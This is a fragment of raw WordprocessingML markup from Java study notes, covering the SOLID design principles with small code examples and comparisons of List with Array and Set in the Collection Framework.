      </w:r>
    </w:p>
    <w:p w14:paraId="6500095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743532BB">
          <v:rect id="_x0000_i1397" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D72B7D4"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O – Open/Closed Principle (OCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45031176"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oftware entities should be open for extension, but closed for modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1C6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21F1351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8DB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C54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circ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5473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squar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7D56D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D050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4FBF621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23B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1FD62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p>
    <w:p w14:paraId="3D6886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DEEEE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23A6E0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irc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9CB8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56571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FAF1D5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C06A5F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quar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1906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0A62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E7CA41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EAFF5D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F776A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3C088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raw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120372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BF197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E43A320"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You can add new shapes without changing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ShapePrinter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5E3A9"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37E8165D">
          <v:rect id="_x0000_i1398" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B8690"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L – Liskov Substitution Principle (LSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B616A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ubtypes must be substitutable for their base types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290FF4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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E407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51C61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D791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ird is flying"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC74D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41A16A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57E4866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par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05B11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6672FE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A63AB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parrow is flying"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57265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4D3D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CEF673E"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Violation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758B5B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strich</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40725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506E6DC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76824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UnsupportedOperationExcepti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strich can't fly"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870917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8A755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7C4CA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Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use better hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A1EA8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B0312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lying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59E69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p>
    <w:p w14:paraId="2AF0888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8B249B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5DAEACF3">
          <v:rect id="_x0000_i1399" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2741B"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I – Interface Segregation Principle (ISP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECF0F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Clients should not be forced to depend on methods they do not use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE6418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786C982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17092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p>
    <w:p w14:paraId="03C630E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p>
    <w:p w14:paraId="654EAF6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AC306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C9B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281B9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nnecessary for robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C5EC9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51271F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1FAAD60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E2182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at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C52D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26E08F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25AEAA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E923B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17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B3676"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112DC4D7">
          <v:rect id="_x0000_i1400" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74611483" w14:textId="77777777" w:rsidR="000F4A91" w:rsidRPr="00CE4B95" w:rsidRDefault="000F4A91" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C351BB2"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D – Dependency Inversion Principle (DIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74326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17D1577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15CFF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D81F1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E2E299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BFF984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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678265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087C97B"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444938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F6E47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p>
    <w:p w14:paraId="65A7A27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B1085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73CC103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961F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8530E1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254FE6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473F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95E1CA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4A7D117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3B151A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98AB3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02ED82E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284B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D6978C7"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23E5286D">
          <v:rect id="_x0000_i1401" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B7296"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CE4B95" w14:paraId="69FEC7DE" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3377CDEB"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Principle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="162379A7"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="38D9F250" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E4685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S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2279E1D8"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One class = One job</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="1A453609" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C31AE8C"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O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3901EF47"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Add features by extending, not modifying</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="7B3926EE" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C36B6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L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A019EE3"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rived classes should work like the base</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="631D7161" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A9768B4"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I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D989F1F"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Split large interfaces into smaller ones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="527859FC" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B937FA9"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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64956609"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pend on abstractions, not implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="125B6459" w14:textId="7094F161" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="7C5C00BB">
          <v:rect id="_x0000_i1402" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="003F20E5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BAEDD" w14:textId="71F9AC7E" w:rsidR="00DD2727" w:rsidRPr="00CE4B95" w:rsidRDefault="00F65D6E" w:rsidP="00F65D6E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc197867345"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Collection Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="41EF01CE" w14:textId="77777777" w:rsidR="00AD1B31" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD1B31" w:rsidP="00AD1B31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0924FCC5" w14:textId="10471B5F" w:rsidR="00F27543" w:rsidRPr="00CE4B95" w:rsidRDefault="00F27543">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc197867346"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between List and </w:t>
      </w:r>
      <w:r w:rsidR="002F6BC8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="6B01C424" w14:textId="1C977767" w:rsidR="00F27543" w:rsidRPr="00CE4B95"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CE4B95"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CE4B95" w14:paraId="6E99CAA6" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4397F6CC"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java.util.List)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="5EF1D97A" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D00338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implemented by ArrayList, LinkedList, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="3954477A" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F30F73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an grow or shrink)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="24CE6ABF" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7146D79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list = new ArrayList&lt;&gt;();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="4C9B44BB" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE1F5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bjects (e.g., Integer, String)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="371781C0" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BA8893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resize, insert, delete easily)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="0E226B7A" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD9683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nternal structures like arrays or nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="1FED093B" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5981D27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dynamic nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="3B7472FD" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6387ED5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for ArrayList, slower for LinkedList</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="7B1227E7" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D6C2AAC"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y built-in methods: add(), remove(), contains(), etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="5718401C" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0291D43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5A070E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404D117E" w14:textId="77777777" w:rsidR="00E61DAC" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="00A63D48" w:rsidP="00A63D4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2B4902C1" w14:textId="77777777" w:rsidR="00AF20BB" w:rsidRPr="00CE4B95"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CE4B95" w14:paraId="0031EB78" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C8040FC"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fer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="3F436A6E" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16230262"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="120B1B9F" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1856E18B"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r w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="2A8043A1" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2F54F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or use List&lt;Integer&gt;, with boxing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="3B2F2612" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15AF3F5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bl>
    <w:p w14:paraId="14CB3FFC" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="00E61DAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EA06AA" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95" w:rsidRDefault="0060368C" w:rsidP="0060368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0E9560"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0B1D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p>
    <w:p w14:paraId="5EE2D6CC"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3F574692"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039BE5E7" w14:textId="63C4746A"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7395DF77"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st:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483FF89"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76EEF6E5"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48829E0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257BBD6A" w14:textId="371DC7B2"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5F5734F2" w14:textId="17E41846" w:rsidR="0060368C" w:rsidRPr="00CE4B95" w:rsidRDefault="0060368C" w:rsidP="0060368C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FC11EF" w14:textId="088B8A5A" w:rsidR="005648DE" w:rsidRPr="00CE4B95" w:rsidRDefault="005648DE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc197867347"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00F93004"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ist and </w:t>
      </w:r>
      <w:r w:rsidR="00F93004"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33"/>
    </w:p>
    <w:p w14:paraId="65945546" w14:textId="388EDB9E" w:rsidR="00FD4044" w:rsidRPr="00CE4B95"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List and Set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mparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F218917"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34950788"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544EAD85"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9639B3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ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A Lis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 xml:space="preserve">: Lists allow access to elements via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 xml:space="preserve"> (e.g., list.get(index)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71E15C"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DDF823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for HashSet)</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guarantee any specific order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ndex-based Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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some implementations of Set, such as LinkedHashSet, do mainta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100160EA"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEFB44C"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uplicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E47F6E"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5DF98529"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Duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A List allows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You can add the same element multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48766CCE"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You can add the same number to a list more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238FECB"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F93710F"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If you try to add a duplicate element, it will be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366538F3"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9B60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Classes:</w:t>
      </w:r>
    </w:p>
